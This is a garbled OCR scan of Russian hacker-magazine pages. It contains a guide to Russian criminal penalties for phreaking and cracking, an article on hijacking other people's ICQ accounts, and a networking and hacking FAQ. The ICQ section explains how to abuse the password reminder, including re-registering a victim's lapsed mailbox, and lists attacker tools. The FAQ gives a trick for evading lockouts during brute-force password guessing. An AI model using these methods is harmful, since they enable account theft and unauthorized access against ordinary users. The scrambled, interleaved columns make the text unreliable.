ны на нефть и девочек в новом клубе. Братиш- 
ка, ты опять нарушаешь конституционные права 
граждан. Кем ты себя возомнил, ФСБой? Ты по- 
пал под статью 138 УК (Нарушение тайны пере- 
писки, телефонных переговоров, почтовых те- 
леграфных и иных сообщений) - бабки или год 
Колымы. КОАП тебя тоже не бросит: статья 137 
- бабло. А твое кул оборудование пойдет на бла- 
готворительные цели - техническое перевоору- 


РЕШЕТНЯ 


жение родных органов. Твоего поставщика так- 
же пригреет 138 УК, только сильнее: 200-500 
минимамок (если повезло) или три года отдыха 
с полосатыми друзьями в одном номере (если - 
не очень). 

3. Ты вскрыл телефон-автомат, который торчит 
у тебя под окном, и подсосал к нему трубочку, 
теперь болтаешь со всем миром абсолютно фор 
фри. Оказывается, ты сотворил самовольное 
подключение оконечного оборудования к сетям 
электросвязи (ст. 136.1 КОАП). За это на тебя 
наложат... э-э-э... штраф 15-60 минизряплат и 
конфискуют трубку с проводками. А еще ты пов- 
редил телефон-автомат (ст. 140 КОАП). За это 
твой бюджет кастрируют на 35-70 МиниМало. И 
для полноты ощущений ты оплатишь свой бес- 
полезный треп МГТС. 

4. Ты стал совсем крут и научился заряжать те- 
лефонные карточки (Чумак, однако!) или де- 
лаешь их бесконечными. Ну, от одной карточки 
МГТС или Урмет на бобы не сядут. Ну, штрафа- 
нут тебя. Но вот если ты удумал творить карточ- 
ки поточным методом и сбывать их за приемле- 
мую цену, то держись. К твоей заднице будет 
крепко припаяна статья 187 УК РФ (Изготовле- 
ние или сбыт поддельных кредитных карт либо 
расчетных карт и иных платежных документов). 
Если слил партию разок, то отдохнешь под клет- 


чатым небом 2-6 лет и заплатишь за отдых 500- 
700 мини-денег. Если трудился долго и даже ус- 
пел организовать свою группу (андеграундную 
=)), оттяпаешь себе 4-7 лет покоя и умиротво- 
рения с конфискацией. 


Тебе, крякер, надежда пира- 
тов 


Хай, дружище-крякер! Что 6 мы без тебя дела- 
ли? Вчера к тебе завалился местный Аль-Капо- 
не с Митино-Базара (спасибо Холоду за клас- 
сное словечко =)), принес тебе программулину 
стоимостью в кучу американских зеленых чер- 
тей и сказал: “Поломать!”. “Есть! - ответил ком- 
COMON, - а также пить и спать!" =) Ты вторгся 
на территорию Закона об авторском праве (№ 
5351-1) и его брата Закона о правовой охране 
программ для ЭВМ и баз данных (№ 3523-1). 
Изучай! Оказывается, эти законы еще и разре- 
шают кое-что: ты можешь записывать и хра- 
нить программу в памяти ЭВМ =), ты можешь 
сделать резервную копию проги на случай уте- 
ри законно приобретенного оригинала, ты мо- 
жешь осуществлять (или поручить кому-ни- 
будь, крякеру, например) адаптацию проги для 
ЭВМ, декомпилировать (!) и изучать кодирова- 
ние и структуру софтины, правда, только для 
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обеспечения взаимодействия с другой прогой. 
А ты, оказывается, скользкий тип, братишка! 
=) Можешь ковыряться в кишках пациента, ло- 
мать защиту и попробуй докажи, что ты там че- 
го-то не адаптируешь! Но и ты можешь проко- 
лоться. Если взяли пирата, через него вышли 
на тебя и нашли в твоих архивах поломанную 
версию софтины, то лови соучастие в деянии, 
предусмотренном статьей 146 УК РФ (Наруше- 
ние авторских и смежных прав). Тебя оштра- 
фуют на 200-400 микрозарплат, либо исправи- 
тельно поработаешь, либо посидишь годика 
два. А если ты с пиратом еще и сговорился 
предварительно, то 5 лет - твои. Если ты ис- 
пользовал куски кода поломанной софтины в 
своем варезе, зашибаешь на нем бабло и тебя 
уличили, то будешь пыхтеть, возмещая убытки 
автору. Компенсации за нарушения авторского 
права могут достигать 50000 минимумов (хоть 
они и минимумы, но их туча =)). 

Ты же, пират, тоже отгребешь по статье 146 
УК РФ, причем твою вину будет доказать нам- 
ного легче. А еще потеряешь весь товар, так 
как все контрафактные (незаконные) копии 
по закону должны уничтожаться. Именно на 
этом основании доблестные органы 
потрошат Митино, Горбушку и про- 
чее Царицыно. 
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ТЕТЯ ACA 


Camas sonbuwas 


cpipa ICQ 


-=ROM@N AKA РОСЕМТ=- <DOCENT@cCOMAIL.RU> 


от сидишь ты в своей Ace, защищен- 
= ный самыми крутыми файрволами, ан- 

тивирусами и прочими наворотами. Ты 
думаешь, ты в полной безопасности и ни один 
урод тебя не достанет? А вот ты и ошибаешься! 
Знаешь, что говорил Митник по поводу непроби- 
ваемых систем защиты? “Самое слабое звено 
системы - это человек". Ну, допустим, ты защи- 
тил себя файрволом, поставил антивирус, не от- 
крываешь ни один подозрительный файл, отсы- 
лаешь и вдогонку нюкаешь всяких “Бритни 
Спирс”, пытающихся переслать тебе свою фотку 
по Ace с именем типа БЫ" леу.]ру............ ехе. Мо- 
жет быть, это тебя и спасет, но вот твою Асю 
можно спокойно поиметь и минуя все эти слож- 
ные навороты. Пока что можешь отложить свой 
Legion, XSHaReZ и любимый троян в сторону, 
для этого способа они не понадобятся. Весь при- 
кол заключается в том, что в ТСО есть такая 
фишка, как автоматическое напоминание паро- 
ля. Если ты вдруг случайно забыл свой пароль 
от Аси, то достаточно зайти на Www.icg.com и, 
указав свой (ЛМ, попросить систему выслать па- 
роль на твой e-mail, который был указан в твоих 
регистрационных данных. Пароль приходит в 


Вот сидишь ты в своей Асе, защищенный самыми 
крутыми файрволами, антивирусами и прочими на- 
воротами. Ты думаешь, ты в полной безопасности и 
ни один урод тебя не достанет? А вот ты и оши- 


баешься! 


течение суток. 
Итак, вот что нужно сделать, чтобы поиметь Асю 
таким способом. Например, твой UIN: 12345678, 
ящик, который ты указал как primary в ICQ 
(именно на него высылается забытый пароль): 
vasya@pupkin.ru . Подсказка для тех, кто в тан- 
ке, все эти данные просматриваются в User Info. 
Первый способ - это получить доступ к ящику 
vasya@pupkin.ru и заставить систему ICQ выс- 
лать якобы забытый пароль. Если этот ящик еще 
к TOMY же зарегистрирован Ha Mail.ru (vasyapup- 
kin@mail.ru) или другой бесплатной мыльнице, 
тогда это проще - эти системы, как правило, то- 
же имеют систему напоминания пароля (причем 
очень часто тупую и дырявую), если что-то дру- 
гое - сложней, но тоже можно. В этом случае ос- 
тается только получить пароль от ICQ, и все. Как 
поиметь чужой ящик - это уже тема отдельного 


Напоследок несколько полезных программ для 
ICQ-attacker’a. Все программы можно скачать по 
адресу www.8th-wonder.net. 

сё FORCE - программа для перебора паролей. 
1СУ2 - программа, позволяющая посмотреть User 
Info и точный IP адрес (даже если он скрыт!) у ак- 
тивных пользователей в контактном листе. 

ICU2 Extreme - аналог ICU2, но работающая как 
клиент и позволяющая получить больше информа- 
ции о любом пользователе (не только активном и 
не только в контакт листе). ICQ клиент должен 
быть выгружен, если вы заходите под тем же логи- 
ном, под которым сидите в ICQ. 

Multi ICQ - патч, позволяющий запустить на одном 
компе несколько ICQ клиентов. 

Dark ICQ - программа, позволяющая просмотреть, 
находится ли пользователь в онлайне или нет, да- 
же если он спрятан в инвизибле. 

ICQ Explorer - браузер, позволяющий скачивать 
файлы с компа активного пользователя, если из- 


вестен ero IP и если у него есть 


омашняя страни- 


ца (рядом с его ником стоит изооражение домика). 


разговора, поэтому здесь я это затрагивать не 
буду, да ты и сам наверняка знаешь. 


Второй способ - это проверить, может быть этот 
ящик уже не использовался в течение долгого 
времени? Некоторые бесплатные мыльницы 
удаляют адрес, если он не юзается в течение, 
скажем, полугода. Тогда просто достаточно за- 
ново создать ящик с именем, указанным в 
Primary Email (vasya@pupkin.ru), зайти на 
www.icg.com и “попросить” напомнить пароль. 

Как видишь, и ломать-то особо ничего не нужно. 
А как защититься, думаю, ты уже и так понял - 
достаточно просто удалить свой e-mail из своего 
User Info. Да, системе напоминания пароля ICQ 
некуда будет выслать пароль, если ты его вдруг 
забудешь. Но в то же время она не вышлет его и 
тому, кто его просто не знает, но очень хочет 
знать. А пароль... настоящий куль хацкер дол- 
жен держать его в своей голове. 
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HACK 


NOAH (NOAH@INBOX.RU, UIN 983332) 
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X, дружище, сетевой хак - это тебе 
= не шуточки, а уж тем более его исто- 

рия - не какое-нибудь там романти- 
ческое чтиво для домохозяек. Непонятные 
термины, бессмысленные аббревиатуры, го- 
ловоломные определения... Чтоб ты не за- 
путался во всяких сложных штуках, мы под- 
готовили для тебя этот ФАК по сетям и по их 
хаку. Заглядывай сюда, если что непонятно. 
А особо любопытным перцам рекомендуется 
сесть и прочитать ФАК полностью. 


“ОЛ. Что такое сервер? 


Сервер - это подключенный к сети комп, на 
котором установлен какой-либо серверный 
софт, предоставляющий соответствующие 
сетевые услуги - сервис. Дословно server с 
басурманского переводится как “предостав- 


п 


ляющий услуги”, “обслуживающий”. 


-О2. Что такой клиент? 


Клиент - это подключенный к сети комп, на 
котором установлен клиентский софт, поз- 
воляющий соединиться с соответствующим 
серверным софтом на сервере и воспользо- 
ваться предоставляемой услугой (серви- 
сом). Как понятно, клиент - это тот, кого на- 
до обслужить. 


СПЛОВОБЛУОИЕ 


верное ПО, его обязательно привязывают к 
какому-нибудь порту, чтобы клиент, кон- 
нектящийся к серверу (по адресу сервера), 
мог уточнить, с каким именно серверным 
софтом он хочет иметь дело, каким именно 
сервисом хочет воспользоваться (ведь 
один сервер может предоставлять 
сразу несколько сервисов). Если 
ты явно не указал клиентскому 
софту, на какой порт сервака 
надо коннектиться, он может 
узнать номер порта, на котором 
висит соответствующий ему 
серверный софт, у операцион- 
ки, установленной на сервере. 
Номер порта - обычное число, 
его присоединяют к адресу ма- 
шины после двоеточия, когда хотят уточ- 
нить, на какой порт коннектиться. Грубо го- 
воря, порт - это адрес серверного ПО в мас- 
штабах сервера. Только не перепутай сер- 
верные порты с портами принтера и с сот- 
портами!!! :) 


„05. Что такое прото- 
кол? 


ОЗ. А можно попод- 
* po6Hee о том, как ра- 
ботает эта система 


клиент-сервер? 


Можно. Все очень просто, достаточно пред- 
ставить себе все это на каком-нибудь харак- 
терном примере. Допустим, на твоем компе 
установлен браузер, а на компе твоего прова 
установлен web-cepBep под управлением 
Apache. Тогда твой комп будет клиентом, 
браузер - клиентским софтом, комп прова - 
сервером, Apache web-cepBep на компе прова 
- серверным софтом. После того как ты набе- 
решь адрес странички своего прова в окне 
браузера, он (браузер) соединится с web-cep- 
Bepom Apache на компе твоего прова и попро- 
сит переслать себе файл запрошенной стра- 
нички. В данном случае сервис, предостав- 
ляемый серверным софтом (Apache) на компе 
твоего прова, - web-cepBep. Клиентский и 
серверный софт всегда работают по заранее 
определенным протоколам (для браузера и 
меЬ-сервера это - HTTP, для почтового клиен- 
та и почтового сервера это - POP3/SMTP, для 
telnet-KnueHTa и telnet-cepBepa - telnet). 


Протокол - это заранее оговоренные прави- 
ла, по которым происходят различные сете- 
вые сеансы связи. Иначе говоря, протокол - 
это стандарт передачи данных по сети. 
Объясняю на житейском примере: когда ты 
звонишь по телефону, ты всегда сначала го- 
воришь “Алло!”, потом здороваешься и уж 
только после этого просишь там кого-то к 
телефону и начинаешь трепаться. Это про- 
токол разговора по телефону :). Правда, это 
негласно принятый протокол - ты можешь и 
не следовать его правилам. А вот сетевые 
протоколы приняты совершенно официаль- 
но. Благодаря четкости и строгости следова- 
ния протоколам, мы можем юзать сервис, 
предоставляемый сервером, вне зависимос- 
ти от того, какое клиентское ПО установле- 
но у нас и какое серверное ПО установлено 
на серваке. То есть каким бы браузером ты 
не пользовался, web-cepBep (каким бы он 
ни был), установленный на сервере, всегда 
знает, какого вида запрос он получит (сог- 
ласно НТТР) и какого вида ответ надо отсы- 
лать. Для разных нужд используются раз- 
ные протоколы. 


"ОБ. Что такое TCP/IP? 


"04. Что такое порт? 


Порт - это абстрактное, программное поня- 
тие. Когда на сервере устанавливают сер- 


Это ряд протоколов, объединенных вместе в 
“семейство” протоколов под общим назва- 
нием TCP/IP (по названиям двух основных 
протоколов: ТСР и IP). На семействе прото- 
колов TCP/IP построен Internet. В TCP/IP 
входят следующие протоколы: 

IP - Internet Protocol. Межсетевой протокол. 


TCP - Transmission Control Protocol. Протокол 
управления передачей. 

UDP - User Datagram Protocol. Протокол 
пользовательских датаграмм. 

HTTP - HyperText Transfer Protocol. Протокол 
передачи гипертекста. По этому протоколу 
происходит пересылка документов по web. 
Юзается web-cepBepom и браузером. По умол- 
чанию web-cepBep висит на 80-м порту. 

FTP - File Transfer Protocol. Протокол переда- 
чи файлов. По этому протоколу ты лазаешь 
no Нр-архивам, заливаешь файло своих 
страничек на сервер хостера, ковыряешься 
на тр3’шных ftp-cepBakax. Юзается ftp-cep- 
вером и Нр-клиентом. По умолчанию ftp- 
сервер висит на 21-ом порту. 

SMTP - Simple Mail Transfer Protocol. Прото- 
кол отправки почты. По этому протоколу 
твой почтовый клиент коннектится к почто- 
вому серверу и отсылает ему твои мессад- 
жы; 

POP3 - Post Office Protocol. Протокол чтения 
почты. А по этому протоколу твой почтовый 
клиент проверяет наличие новых писем для 
тебя на сервере и забирает их оттуда, если 
они есть. Этот протокол требует авториза- 
ции (введения логина и пароля), так как в 
противном случае любой смог бы забирать 
чужую почту. По умолчанию РОРЗ-сервер 
висит на 110-м порту. 

NNTP - Network News Transfer Protocol. Про- 
токол передачи новостей. По этому протоко- 
лу ты постишь и читаешь мессаги в Usenet. 


CAOBOBAYDKNE 


telnet - протокол эмуляции терминала. 


Именно по этому протоколу ты коннектишь- 
ся на удаленный сервак и работаешь там на 
шелле, как на своем компе. По умолчанию 
telnet открывают на 23-м порту. 

Это, конечно, не все протоколы из TCP/IP. 
Подробный разбор всех протоколов потянет 
на пару-тройку увесистых томов :). 


‘07. Что такое DNS? 


сел и имеет вид ххх.ххх.ххх.ххх (напри- 
мер, 213.189.197.201). Для того что- 
бы воспользоваться той или иной 
услугой, — предоставляемой 
сервером, тебе нужно наб- 
рать имя (IP-agpec) 
сервера и порт, на 
котором висит соот- 
ветствующее сер- 
верное ПО. Напри- 
мер, набрав IP 
213.189.197.201 и 
порт 80 в формате 
213.189.197.201:80, 
ты наткнешься на web- 
сервер нашего Х. Впрочем, 
набирая в браузере, номер 
порта можно и пропустить - 
браузер сам разберется. Значит, 
для того чтобы попасть на web- 
сервер Х, нужно набрать в брау- 
зере IP 213.189.197.201. Hy, я 
думаю, ради любимого X можно 
помучиться и запомнить этот 
IP’WHUK :), HO, млин, как же это неу- 
добно!!! Намного логичнее держать в 
голове хаКег.ги! И слава Богу, что пер- 
цы, которые проектировали инет, тоже 
так думали и обо всем позаботились. Они 
придумали доменную систему имен. Те- 
перь, при желании, владелец сервера мо- 
жет привязать к IP-agpecy своего сервера 
доменное имя (например, xakep.ru). Введя в 
своем браузере имя домена, ты прямиком по- 
падаешь на IP’WHUK, к которому оно привяза- 
но. Система эта работает следующим обра- 
зом: ты вводишь доменное имя, твой браузер 
соединяется с ближайшим (чаще всего про- 
вайдерским) DNS-cepBepom и просит ero вы- 
дать IP, к которому привязано это доменное 
имя. О№-сервер копается в своей базе дан- 
ных и, если нашел, выдает айпишник. Если 
же искомое доменное имя не находится, 
0№-сервер запрашивает его у О№ -сервера 
более высокого уровня (корневого). И так они 
будут друг друга пинать, пока не найдут зап- 
рошенное тобой доменное имя и айпишку, к 
которой оно привязано. Если же это доменное 
имя не будет найдено (не зарегистрировано), 
тебе вернут ответ об ошибке. Общение с DNS- 
сервером происходит по специально для это- 
го написанному одноименному (DNS) прото- 
колу. 


08. А можно попод- 
робнее именно о до- 
менных именах? 
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.org, .edu, .gov, .mil, .int и двухбуквенные 
национальные домены (.ru, „ИК, .US, .fr, .jp и 
т.д.). Кстати, совсем скоро к доменам Bep- 
хнего уровня будут добавлены следующие 
домены: .biz, .info, .name, .pro, .museum, 
aero, .соор. Хочешь себе доменное имя 
hack.pro ;)? Я тоже хочу :). Далее, как ты 
уже догадываешься, идут домены второго 
уровня (хаКер.ги). Доменами в зоне „ги ве- 
дает Российский НИИ Развития Обществен- 
ных Сетей (РосНИИРОС). Среди доменов 
второго уровня есть домены общего пользо- 
вания (generic) и домены открытого пользо- 
вания (public). Домен общего пользования 
тебе не дадут зарегистрировать, а жаль :(. 
Домены всех остальных уровней, или сабдо- 
мены (Subdomain), или виртуальные домены 
(все это разные названия одного и того же) 
- всего лишь директории на сервере. Напри- 
мер, super.xakep.ru, super - директория Ha 
сервере xakep.ru. 


“09. Что такое SSL? 


Secure Socket Layer - это протокол, который 
шифрует другие протоколы в двоичные дан- 
ные, защищенные от перехвата. Дело в том, 
что подавляющее большинство протоколов 
(например, НТТР) работают (передают и 
принимают) с данными в открытом, тексто- 
вом виде. Соответственно, в таком же от- 
крытом виде, вместе с остальными данными, 
передаются всякие пароли и прочая конфи- 
денциальная информация. Так вот, SSL и 
занимается тем, что все это дело шифрует. 


"10. Что такое CGI? 


DNS - Domain Name System. Доменная систе- 
ма имен. Я надеюсь, ты знаешь, что все Ma- 
шины в инете имеют свои уникальные имена 
- [Р-адреса. [Р-адрес состоит из четырех чи- 


Вот, смотри, первый домен в иерархии до- 
менов - корневой домен, не имеющий име- 
ни. Из него произрастает некоторое коли- 
чество доменов верхнего уровня: ‚сот, .net, 


Common Gateway Interface - общий (или еди- 
ный) шлюзовой интерфейс. Это механизм, 
позволяющий клиенту запускать приложения 
на сервере по протоколу НТТР. Не обольщай- 
ся, это не означает, что ты сможешь запус- 
тить на серваке кваку из браузера :). Имеет- 
ся в виду, что ты можешь запускать только 
заранее определенные проги, называемые 
CGI-ckpuntamu. По умолчанию все ССГшки 
лежат в директории cgi-bin web-cepBepa. 
Простой пример использования ССТ: на сайте 
е-тай-рассылки ты вводишь свое мыло в по- 
ле формы и жмешь кнопарь Submit. Браузер 
отсылает web-cepBepy запрос, в котором го- 
ворит, что обращается к такой-то ССГ’шке (к 
той, на которую ссылается форма) с такими- 
то данными (твоим мылом). С этого момента 
запускается CGI-nporpamma, которая выди- 
рает мыло из тела запроса, записывает его в 
базу данных рассылки, генерит твоему брау- 
зеру html’ky вида “такое-то мыло успешно до- 
бавлено в рассылку” и завершается. Чаще 
всего СС[-проги пишут на Perl, хотя можно и 
на С, и на любом другом языке. 
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11. Как понимать — 
“работать удаленно”? 


Ну, гляди. Ты запускаешь у себя telnet- 
клиент, коннектишься к telnet-cepBepy, BBO- 
дишь свои логин и пароль (или чужие логин 
и пароль ;)) и работаешь на шелле с тамош- 
ней осью так, как будто ты сидишь за той 
машиной. Таким образом ты юзаешь ресурсы 
сервера: место на диске, память, вычисли- 
тельные ресурсы - короче, все что угодно. 
Происходит это по протоколу telnet, о чем я 
уже говорил. 


‚12. Что такое хост 
(host)? 


Хост - это главный комп в локальной сети, 
комп, который непосредственно подключен 
к инету. Еще хостом называют адрес этого 
самого компа. 


13. Что такое хостинг 
(hosting)? 


Хостинг, или виртуальный хостинг, - это ког- 
да кто-то предоставляет тебе услуги хоста, 
хостит твой сайт на своем сервере. Грубо го- 
воря, тебе выделяют “кусок” от сервера, ку- 
да ты можешь залить свое файло и который 
ты можешь удаленно администрировать. 


14. Что такое сокет 
(socket)? 


Сокет - это как раз и есть порт по-басур- 
мански (дословно - разъем). В си- 
лу сложившихся o6- 


стоятельств 


под словом сокет подразумевают то, что на- 
ходится за номером порта, то есть сервер- 
ный софт, а под словом порт подразумевают 
конкретно сам порт, его номер. Про сокет го- 
ворят, что это конечный пункт в процессе 
обмена данными. Сокеты имеют вид: 
хост: порт. Как ты уже знаешь, так адресует- 
ся конкретное ПО на конкретном порту. 


СПОВОБЛУОИЕ 


15. Что такое URL? 


Universal Resource Locator - стандартный ад- 
ресный формат - адрес файла в инете. URL 
имеет вид: 
“http://www.xakep.ru:80/folder/file.Atml”. 
Здесь: “http” - схема, протокол, по которому 
будет получен файл (не обязательно http, 
может быть, например, ftp), “://" - раздели- 
тель, после него должно следовать имя хос- 
та, “www.xakep.ru” - имя хоста (“www” - это 
не “нечто особенное”, а всего лишь папка с 
именем “www” на web-cepsepe, “хаКег.ги” - 
доменное имя сервера, вместо него можно 
писать IP), “:80” - означает, что мы коннек- 
тимся к софту, который висит на 80-м порту, 
“/folder/file.html” - путь к файлу на сервере 
(начиная от директории www меб-сервера). 
http://www.anyhost.net - это тоже URL, то же 
самое, что и http://www.anyhost.net- 
/index.html. Просто подразумевается, что 
файл index.html на меб-сервере является 
начальным файлом, файлом по умолчанию. 


16. Что такое ргоху- 
сервер? 


Допустим, тебе срочно по- 
надоби- 


лось пообозревать какую-нибудь хтмл-стра- 
ничку с далекого зимбабвийского сервака. 
Коннект у тебя с ним просто отстойный, и 


страничка качается часами. Что делать? 
Коннектиться через ргоху-сервер! Ты пи- 
шешь в настройках своего браузера адрес 
ргоху, через который хочешь работать 
(обычно провайдерского, т.к. он “ближе” 
всего к тебе), и, как обычно, вводишь URL 
той странички. Твой верный браузер кон- 
нектится к прокси и просит у него эту пагу, 
тот, в свою очередь, коннектится к зимбаб- 
вийскому серваку, забирает оттуда пагу и 
скармливает ее твоему браузеру. Это срабо- 
тает намного быстрее, т.к. у прокси связь с 
инетом заведомо намного лучше твоей. Осо- 
бый кайф в том, что прокси не удаляет эту 
страничку сразу после того, как ты ее пос- 
мотрел, он скрупулезно кэширует ее вместе 
со многими другими страничками (не ты же 
один этим прокси пользуешься) и хранит 
несколько дней. Если еще каком-нибудь 
перцу после тебя понадобится эта странич- 
ка, то он сразу получит ее с ргоху-сервера - 
быстро и экономично. Кроме этого, у ргоху- 
серверов есть еще одна вкусность: работая 
через него, ты не светишь свой IP’WHUK. Bo 
всех запросах фигурирует IP твоего proxy. 
Правда, это зависит от типа прокси. Они бы- 
вают прозрачными (transparent - не скры- 
вает твой IP) и непрозрачными (по transpar- 
ent - наглухо прячет твой IP, светит только 
свой). Но не стоит считать это абсолютной 
защитой от обнаружения: если ты сделаешь 
что-то плохое, работая через непрозрачный 
прокси, и если за тобой погонятся серьез- 
ные люди, им ничего не будет стоить слегка 
надавить на владельца того прокси, кото- 
рый с удовольствием откроет им все свои 
логи, - кому охота получать по башке ради 
твоей анонимности. 


17. Что значит “прос- 
канить порты маши- 
ны”? 


Это значит проверить машину на наличие 
открытых портов. Открытые - это те, на ко- 
торых что-то висит. Обычно сканят либо 
диапазон адресов на наличие одного кон- 
кретного открытого порта, либо один адрес 
на наличие любых открытых портов. Надо 
это для того, чтобы потом выяснить, какой 
софт висит на этих портах и нет ли в нем ка- 
ких-нибудь примечательных дыр. Для ска- 
нирования сетей и машин используют скане- 
ры портов. Существует несколько разных 
способов сканирования: такие, при которых 
факт сканирования может быть засечен, и 
stealth-ckKaHupoBaHue, при котором скани- 
руемая система остается в неведении отно- 
сительно того, что ее сканируют. 


CAOBOBAYDKE 


-18. Что такое квота 
(системная квота)? 


Системные админы назначают всем своим 
юзерам квоты, ограничивают ресурсы, кото- 
рые юзер может поюзать. Этот процесс на- 
зывается квотированием. Делается это для 
того, чтобы один юзер не смог зажрать все 
место на харде, предназначенное (предна- 
ЗАНАЧЕННОЕ :)) для всех юзеров. Квоты 
можно назначать на разные ресурсы: на па- 
мять, на место на харде, на трафик и т.д. 
Выглядит это следующим образом: напри- 
мер, под твой аккаунт на сервере отводится 
10 Mb места, а всем процессам, запущенным 
тобой, разрешено занимать в памяти не бо- 
лее 20 Mb ит.д. 


19. Кто такой роутер 
(router) и что такое 
маршрутизатор? 


Роутер и маршрутизатор - это одно и то же. 
Научным языком маршрутизатор - это сово- 
купность аппаратных и программных сред- 
ств для управления потоками данных в се- 
ти. То есть это подключенный к сети комп 
со своим специфическим софтом, в задачу 
которого входит регулировать трафик в се- 


ти, направлять сетевые пакеты. Через мар- 
шрутизатор к инету подключают локальные 
сети. 


"20. Что такое firewall? 


Firewall (иначе брандмауэр, межсетевой 
фильтр) - это комп, который подключают на 
участке сети между локальной сетью и мар- 
шрутизатором. В его обязанности входит 
фильтровать весь трафик и не допускать 
проникновения в локальную сеть извне. 
Firewall не дает никаким IP-agpecam, кроме 
тех, которые записаны в его настройках, 
проходить через себя. 


‚21. Что такое сниф- 
финг (sniffing)? 


В сетях, построенных на основе TCP/IP, вся 
информация передается, в основном, в от- 
крытом виде (в том числе и всякие секрет- 
ные данные - пароли и логины). Поэтому 
очень выгодно бывает настроить на одной 
машине софт, который будет просматривать 
все пакеты, проходящие по сети, и прове- 
рять, не содержится ли в них каких-нибудь 
паролей. Это и есть сниффинг. А такой софт 
называется сниффером. Сниффинг - излюб- 


О-ых 
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лен- 
ный ме- 

тод многих 
хакеров. Cam 
подумай, поставил 


сниффер на участке 

сети, которую хочешь сло- 

мать, и, через некоторое время, получил ка- 
кое-то количество паролей юзеров этой се- 
ти (пускай там и не окажется пароля рута). 
Правда, надо сначала получить возможнос- 
ть установить это самый сниффер :). 


‚22. Что такое айпи- 
спуфинг (IP-spoofing)? 


Да! Есть! Зафиксированы первые хаки (во всяком случае, в том смыс- 
ле, в каком я это понимаю - несанкционированное проникновение в за- 
щищенные сети)! Тогда это не считалось ни криминалом, ни чем-то 
еще. На вопрос “Почему ты это сделал?” ответ “Смог, вот и сделал” мог 
показаться очень даже логичным. К этому времени уже существовал 
ряд крупнейших сетей. Продолжалось становление тандема UNIX-C. 
Именно плоды этих двух технологий стали излюбленными инструмен- 
тами хакеров. На продажу были выставлены первые персоналки. Это, 
вкупе с другими факторами, привлекло внимание новой порции моло- 
дежи к хаку. Хак переплетался с другой, очень близкой ему, культурой 
- с фрикингом. Правда, телефонные компании того времени еще не 
очень активно использовали компьютерные сети, поэтому фрикинг 
сводился к собиранию различных Бох'ов, позволяющих вытворять вся- 
кие плохие штуки, вроде бесплатных звонков и т.п. На этом этапе фри- 
кинг был более популярен, чем хак. Как правило, фрикерством зани- 
мались технически грамотные молодые люди - студенты и бывшие сту- 
денты (недоучившиеся). Кстати, хакинг не был их основным занятием. 
Да, они умели это делать. Да, они этим занимались. Да, они могли что- 
то хакнуть. Но хак был всего лишь одной из областей применения их 
знаний, и они не стремились изучать именно то, что необходимо знать 
для продолжения конкретно хацкерской деятельности. По сути, это бы- 
ли просто хорошие компьютерные специалисты, но не хакеры. С фри- 
кингом дела обстояли чуть-чуть иначе в силу того, что некоторые при- 
торговывали теми самыми Бох‘ами ;). 


Айпи-спуфинг - подмена реального IP-agpe- 
са ложным. Для чего только эта фича не ис- 
пользуется: для обмана тех же бран- 
дмауэров, для элементарного скрытия свое- 
го IP, для того чтобы подставить кого-ни- 
будь и етс. Как подменить свой айпи, можно 
посоветовать только в конкретной ситуации. 
Во всяком случае не советую тебе занимать- 
ся этим из-под виндов - сам не пробовал, 
но, говорят, геморрой еще тот. 


„23. Что такое СС!-ска- 
нер? 


Сб]-сканер - это простенькая прога, KOTO- 
рая имеет базу данных дырявых цгишек. 
Она промышляет тем, что сканит заданный 
диапазон адресов на наличие какой-нибудь 
дырявой цгишки из своей базы. А что делать 
с дырявыми цгишками, ты знаешь? Правиль- 
но, посмотреть в инете описание их дыр и 
цинично ими воспользоваться в корыстных 
целях :). 


-24, Что такое адреса- 
ция? 


Адресация - это способ идентификации ма- 
шины в сети. Каждая машина должна иметь 
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свой конкретный адрес, в противном случае 
невозможно будет доводить пакеты до ко- 
нечного получателя. В инете используется 
[Р-адресация. Каждой машине выделяется 
уникальный тридцатидвухбитный IP-agpec. 
Не вдаваясь в подробности, скажу, что IP- 
адрес содержит в себе идентификатор сети, 
к которой принадлежит машина, и иденти- 
фикатор самой машины в этой сети. 


25. Что такое шлюз 
(gateway)? 


Это межсетевой маршрутизатор, соединяю- 
щий друг с другом две разнородные сети. 
Он, естественно, должен быть подключен и к 
первой сети, и ко второй. Его работа заклю- 
чается в перенаправлении пакетов из одной 
сети в другую и обратно, причем он должен 
еще и преобразовывать их к понятному для 
этих сетей виду (они ведь разнородные). 


26. Что такое Brute- 
Рогсе? 


Это так называемый “тупой” перебор паро- 
лей. Последовательно подбираются все ком- 
бинации паролей заданной длины, состоя- 
щих из заданных символов. И так до тех пор, 
пока искомый пароль не будет найден. Ес- 


тественно, что все это делается не руками, а 
с помощью специальных прог. Кстати, хоро- 
шие проги позволяют тебе писать алгорит- 
мические скрипты перебора, чтобы не пере- 
бирать абсолютно все комбинации, а только 
некоторые (по твоему скрипту). Брутфорс- 
атаки можно проводить практически на лю- 
бые ресурсы, закрытые паролями: е-тай 
ящики, Ир-аккаунты, файлы passwd, pwl- 
файлы, UIN'bIl. Только надо учитывать, что 
брутфорсить через инет ОЧЕНЬ долго! Хотя, 
если ты будешь брутфорсить не со своей ма- 
шины, а запустишь брутфорс-прогу с шелла, 
все будет ок - заглянешь на шелл через па- 
ру месяцев... опа! штук десять хороших юи- 
нов уже подобралось! Надо только иметь хо- 
роший шелл. Правда, на такие действия ес- 
ть свои противодействия :). Сволочные ад- 
мины ставят на своих серваках лимит попы- 
ток залогиниться с одного ТР, например, три 
попытки. Залогинился три раза неудачно - 
ждешь пять-десять минут :). Но не отчаивай- 
ся, на это противодействие у нас тоже есть 
свое противопротиводействие: через каж- 
Able два раза можно логиниться как guest 
(или еще по какому-нибудь гостевому логи- 
ну), тогда никак не получится, что данный IP 
неудачно залогинился три раза подряд :). 


СПОВОБЛУОИЕ 


Это тот дядя с рогами, в чье распоряжение 
ты попадешь в ином мире, если будешь мно- 
го и невпопад хакать :). А если серьезно, то 
SATAN - Security Administrator’s Tool for 
Analyzing Networks - популярная в прошлом 


прога, сканирующая и анализирующая 
ИМХ-системы на наличие известных дыр. 
Эта прога скандально известна тем, что, 
хоть и была написана для администраторов, 
повсеместно юзалась хацкерами, с той лишь 
разницей, что если админы, найдя дыру, за- 
тыкают ее, а хацкеры - совсем наоборот :). 
Написали ее Дэн Фармер (Dan Farmer) и 
Уитц Венема (Wietse Venema), чем и увеко- 
вечили свои имена в истории хака :). После 
Toro как с помощью SATAN была завалена 
куча серваков, некто Роберт Эванс спохва- 
тился и написал прогу Gabriel, которая засе- 
кает факт сканирования системы SATAN’oM. 
Кроме Gabriel был написан еще целый ряд 
аналогичных прог. 


29. Что такое buffer 
overflow? 


27. Что за 1Р’шник та- 
кой - 127.0.0.1? 


Ра 

